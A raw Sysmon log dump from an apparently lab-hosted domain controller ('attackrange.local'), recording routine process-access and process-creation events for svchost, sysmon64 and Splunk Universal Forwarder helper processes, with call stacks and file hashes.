10341000x80000000000000009344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.687{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.688{59A5CD1D-9328-6005-CE04-00000000A301}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.156{59A5CD1D-9328-6005-CD04-00000000A301}30884304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:48.016{59A5CD1D-9328-6005-CD04-00000000A301}3088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9329-6005-CF04-00000000A301}4608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:54:49.843{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 